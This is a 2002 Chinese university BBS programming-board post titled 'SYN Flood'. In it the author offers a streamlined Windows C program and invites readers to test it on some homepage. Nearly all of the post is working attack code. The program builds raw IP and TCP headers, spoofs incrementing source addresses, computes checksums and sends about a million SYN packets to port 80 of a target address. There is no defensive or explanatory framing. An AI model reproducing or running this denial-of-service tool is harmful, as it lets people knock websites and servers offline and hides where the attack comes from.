Programming 版 (精华区)
发信人: pzc (呆呆地发呆), 信区: Programming
标 题: SYN Flood
发信站: 哈工大紫丁香 (2002年04月14日11:49:07 星期天), 站内信件
网上很多,见过的都画蛇添足。
改造一个简洁有效的,用某个主页试试便知。
程序仍然可以简化和改造,时间匆忙。
#include "stdafx.h"
#include "winsock2.h"
#include "ws2tcpip.h"
#pragma comment(lib,"ws2_32")
#define SEQ 0x28376839
#define SYN 0x2
#define DEST_PORT 80
DWORD SYN_DEST_IP = inet_addr("x.x.x.x");
DWORD FAKE_SRC_IP = inet_addr("111.111.111.111");
typedef struct _iphdr{ //定义IP首部
unsigned char h_verlen; //4位首部长度,4位IP版本号
unsigned char tos; //
unsigned short total_len;
unsigned short ident;
unsigned short frag_and_flags;
unsigned char ttl; //这个定义为short都不行
unsigned char proto;
unsigned short checksum;
unsigned int sourceIP;
unsigned int destIP;
}IP_HEADER;
typedef struct _tcphdr { //定义TCP首部
USHORT th_sport;
USHORT th_dpost;
unsigned int ht_seq;
unsigned int ht_ack;
unsigned char th_lenres;
unsigned char th_flag;
USHORT th_win;
USHORT th_sum;
USHORT th_urp;
}TCP_HEADER;
struct{ //定义TCP伪首部
unsigned long saddr;
unsigned long daddr;
char mbz;
char ptcl;
unsigned short tcpl;
TCP_HEADER tcp_hdr;
}psd_header;
USHORT checksum(USHORT *buffer,int size)
{
unsigned long chsum=0;
while(size>1)
{
chsum+=*buffer++;
size-=sizeof(USHORT);
}
if(size)
{
chsum+=*(UCHAR*)buffer;
}
chsum=(chsum>>16)+(chsum & 0xffff);
chsum+=(chsum>>16);
return (USHORT)(~chsum);
}
int SYN_Flood()
{
int flag=TRUE,SendSEQ=0;
char SendBuf[40]={0};
WSADATA wsaData;
SOCKET SockRaw=(SOCKET)NULL;
struct sockaddr_in DestAddr;
IP_HEADER * ip_header = (IP_HEADER *) SendBuf;
TCP_HEADER * tcp_header=(TCP_HEADER *)(SendBuf+sizeof(IP_HEADER));
WSAStartup(MAKEWORD(2,1),&wsaData);
SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);
setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));
memset(&DestAddr,0,sizeof(DestAddr));
DestAddr.sin_family=AF_INET;
DestAddr.sin_addr.s_addr=SYN_DEST_IP;
//填充IP首部
ip_header->h_verlen =(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long));
//高四位IP版本号
ip_header->total_len =htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));
//16位总长度
ip_header->ident =1;
ip_header->frag_and_flags =0;
ip_header->ttl =128;
ip_header->proto =IPPROTO_TCP;
ip_header->checksum =0;
ip_header->sourceIP =FAKE_SRC_IP;
ip_header->destIP = SYN_DEST_IP;
//填充TCP首部
tcp_header->th_sport = htons(7000);
tcp_header->th_dpost = htons(DEST_PORT);
tcp_header->ht_seq = htonl(SEQ);
tcp_header->ht_ack = 0;
tcp_header->th_lenres = (sizeof(TCP_HEADER)/4<<4|0);
tcp_header->th_flag = SYN; //SYN类型
tcp_header->th_win = htons(16384);
tcp_header->th_urp = 0;
tcp_header->th_sum = 0;
//填充TCP伪首部
psd_header.saddr = ip_header->sourceIP ;
psd_header.daddr = ip_header->destIP ;
psd_header.mbz = 0;
psd_header.ptcl = IPPROTO_TCP;
psd_header.tcpl = htons(sizeof(TCP_HEADER));
for(int counter=0;counter<1024*1024;counter++)
{
if(SendSEQ++==65536) SendSEQ=1; //发无限包才有用
//改IP首部
ip_header->checksum = 0;
ip_header->sourceIP = FAKE_SRC_IP+SendSEQ; //32位源IP
//改TCP首部
tcp_header->ht_seq = htonl(SEQ+SendSEQ); //SYN序列号
tcp_header->th_sum = 0;
//改TCP Pseudo Header
psd_header.saddr = ip_header->sourceIP ;
//计算TCP校验和,计算校验和时需要包括TCP pssudo header
memcpy(&psd_header.tcp_hdr,tcp_header,sizeof(TCP_HEADER));
tcp_header->th_sum = checksum((USHORT*)&psd_header,sizeof(psd_header));
//发送//sizeof(IP_HEADERr)+sizeof(TCP_HEADER)=40
sendto(SockRaw,SendBuf,40,0,(struct sockaddr*)&DestAddr,sizeof(DestAddr));
}
closesocket(SockRaw);
WSACleanup();
return 0;
}
int main()
{
SYN_Flood();
return 1;
}
--
※ 来源:·哈工大紫丁香 bbs.hit.edu.cn·[FROM: 202.118.236.138]
※ 修改:·pzc 於 04月14日11:52:23 修改本文·[FROM: 202.118.236.138]
Powered by KBS BBS 2.0 (http://dev.kcn.cn)
页面执行时间:2.603毫秒